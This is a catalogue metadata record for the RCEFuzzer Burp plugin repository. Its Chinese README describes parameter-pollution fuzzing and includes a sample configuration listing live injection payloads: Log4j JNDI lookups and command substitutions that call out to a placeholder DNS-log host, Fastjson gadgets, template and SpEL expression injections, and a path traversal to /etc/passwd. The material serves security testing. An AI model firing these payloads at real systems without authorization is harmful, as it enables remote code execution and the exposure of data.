{"id":25406105,"url":"https://github.com/TheKingOfDuck/RCEFuzzer","last_synced_at":"2025-10-31T01:32:12.194Z","repository":{"id":214073939,"uuid":"735512441","full_name":"TheKingOfDuck/RCEFuzzer","owner":"TheKingOfDuck","description":"一个以fuzz为中心思想的被动扫描工具","archived":false,"fork":false,"pushed_at":"2023-12-26T13:26:56.000Z","size":18,"stargazers_count":155,"open_issues_count":1,"forks_count":10,"subscribers_count":6,"default_branch":"main","last_synced_at":"2025-01-17T10:09:02.429Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/TheKingOfDuck.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2023-12-25T07:34:04.000Z","updated_at":"2025-01-07T01:54:17.000Z","dependencies_parsed_at":"2023-12-25T17:56:35.035Z","dependency_job_id":"8672b313-f470-4610-a6fc-d84ff1961f1a","html_url":"https://github.com/TheKingOfDuck/RCEFuzzer","commit_stats":null,"previous_names":["thekingofduck/rcefuzzer"],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheKingOfDuck%2FRCEFuzzer","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheKingOfDuck%2FRCEFuzzer/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheKingOfDuck%2FRCEFuzzer/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheKingOfDuck%2FRCEFuzzer/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/TheKingOfDuck","download_url":"https://codeload.github.com/TheKingOfDuck/RCEFuzzer/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":239088383,"owners_count":19579434,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-02-16T05:06:49.189Z","updated_at":"2025-10-31T01:32:12.189Z","avatar_url":"https://github.com/TheKingOfDuck.png","language":null,"funding_links":[],"categories":["Others"],"sub_categories":[],"readme":"# RCEFuzzer\n\n\n## 下载使用\n\n[https://github.com/TheKingOfDuck/RCEFuzzer/releases/tag/0.5](https://github.com/TheKingOfDuck/RCEFuzzer/releases/tag/0.5)\n\n## 参考链接\n\n[RCEFuzzer - 被动扫描与fuzz上一些思路的实现](https://mp.weixin.qq.com/s/NYGBUWY820TDfnaHldxuow)\n\n## 基本介绍\n\n这是一个以fuzz为中心思想的被动扫描工具(该版本是BURP插件,并非独立工具)，多数扫描器的工作逻辑是以已知漏洞去冲目标，然后根据条件判断是否存在这个已知的漏洞；rcefuzzer的工作逻辑是以通用payload去污染目标的参数，然后根据条件判断是否存在未知漏洞。\n\n举个例子，假设被动收集到的流量是\n\nhttps://www.baidu.com\n```\nPOST /sys/customer/list HTTP/1.1\nHost: www.baidu.com\nContent-Length: 23\nContent-Type: application/json;charset=UTF-8\n\n{\"key1\":\"value1\",\"key2\":\"eyJpbm5lcmtleTEiOiJpbm5lcnZhbHVlMSJ9\",\"id\":1,\"isLogin\":false,\"key3\":{\"innerkey2\":\"{\\\"k3\\\":\\\"v3\\\"}\"}}\n```\n如果配置了三条通用的payload:\n```\n${jndi:ldap://dnslog/log4j}\n`whoami`.dnslog\n{\"@type\":\"java.net.Inet4Address\",\"val\":\"dnslog\"}\n```\n\n那么rcefuzzer的参数污染模块将对目标发起以下请求：\n\n* 污染key1的值然后分别发包\n* 通用污染key1的值然后分别发包\n* 尝试自动解码，并污染子JSON的innerkey1的值3次然后分别发包\n* 污染key3的值然后分别发包。\n* 污染子JSONinnerkey2的值，然后分别发包。\n* 尝试解析innerkey2，并污染子JSON的k3的值然后分别发包\n\n理论上总的请求量是3*6=18次。这仅是参数污染模块，如果带上其他模块，那请求量可能是50。如果payload写得多点，原流量大一点，那么可能是5000次。\n\n## 配置说明\n\n```\n\n###\n#\n# 配置说明:\n#    1.tweb的配置是必须要改的, 不改显示不了漏洞\n#    2.白名单的优先级是高于黑名单的\n#    3.所有配置都是可以动态改的, 不用重新加载插件\n# 使用说明:\n#    https://www.wolai.com/gS5UWgMmHG4ynJQgzL3AYk\n###\nconfig:\n  version: |  # 插件版本\n    0.5\n  twebdomain: | # tweb 子域名配置 \n    xxxx.ceye.io\n  twebapi: |  # tweb api配置 其中KEY为展位符,在新旧版本的tweb均可在Profile页面找到。ceye只是举例 ，实际上任何dnslog平台，只要有api可以get查询log即可\n    http://api.ceye.io/v1/records?token=xxxx\u0026type=dns\u0026filter=KEY\n  timeout: |  # 扫描过程中的超时配置 非tweb请求超时设置 单位毫秒 60000为60秒\n    60000\n  hostBlacklistReg: |  # 禁止扫描的域名列表\n    (.+?)(gov\\.cn|edu\\.cn|tweb|google|gstatic)(.+?)\n  extBlacklist: |  # 禁止扫描的后缀列表,这不是正则，本来想从passive-scan-client中抄代码的,结果发现他有bug...\n    .js|.css|.jpeg|.gif|.jpg|.png|.pdf|.rar|.zip|.docx|.doc|.ico\n\njsonPollution:\n  status:  #on为开启 off为关闭\n    on\n  allin: | #替换整个json数据包\n    {\"@type\":\"java.net.Inet4Address\",\"val\":\"dnslog\"}\n  value: | #仅污染json的键值 为了python eval那种情况考虑 不加双引号包裹的话污染结果类似{\"test\":__import__('os')} {\"test\":\"{\\\"dtaa\\\":__import__('os')}\"}\n    \"${jndi:ldap://dnslog/jsonkey}\"\n    __import__('socket').gethostbyaddr('dnslog')\n\nparamPollution:\n  status: #on为开启 off为关闭\n    on\n  exprs: | #为了兼容有回显的表达式注入/代码执行漏洞\n    {{9527*2333}}|22226491\n    ${T(java.lang.System).getenv()}|JAVA_HOME\n    ${T+++++++(java.lang.System).getenv()}|JAVA_HOME\n    {php}var_dump(md5(9527));{/php}|52569c045dc348f12dfc4c85000ad832\n    {if+var_dump(md5(9527))}{/if}|52569c045dc348f12dfc4c85000ad832\n    ../../../../../../../../../../../../../../../etc/passwd|root\n  value: |\n    dnslog\n    ${jndi:ldap://paramPollution.dnslog/log4j}\n    `whoami`.dnslog\n    http://dnslog/\n    ping+-nc+1+dnslog\n\nheaderPollution:\n  status: #on为开启 off为关闭\n    on\n  allin: | #一次性污染除了url和host外的所有请求头\n    ${jndi:dns://dnslog/456}\n    ${jndi:ldap://dnslog/789}\n  headers: | #添加的请求头如果原数据包有则追加原值污染 无则添加后再发包 竖线|为key和value的分隔符号。\n    X-Forwarded-For|${jndi:dns://dnslog/456}\n    X-Api-Version|${jndi:dns://dnslog/456}\n\nssrfPollution:\n  status: #on为开启 off为关闭\n    on\n\nresponseMatch:\n  status: #on为开启 off为关闭\n    off\n  expr: | #添加的请求头如果原数据包有则覆盖原值污染 无则添加后再发包\n    thinkphp:error\n\n\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FTheKingOfDuck%2FRCEFuzzer","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FTheKingOfDuck%2FRCEFuzzer","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FTheKingOfDuck%2FRCEFuzzer/lists"}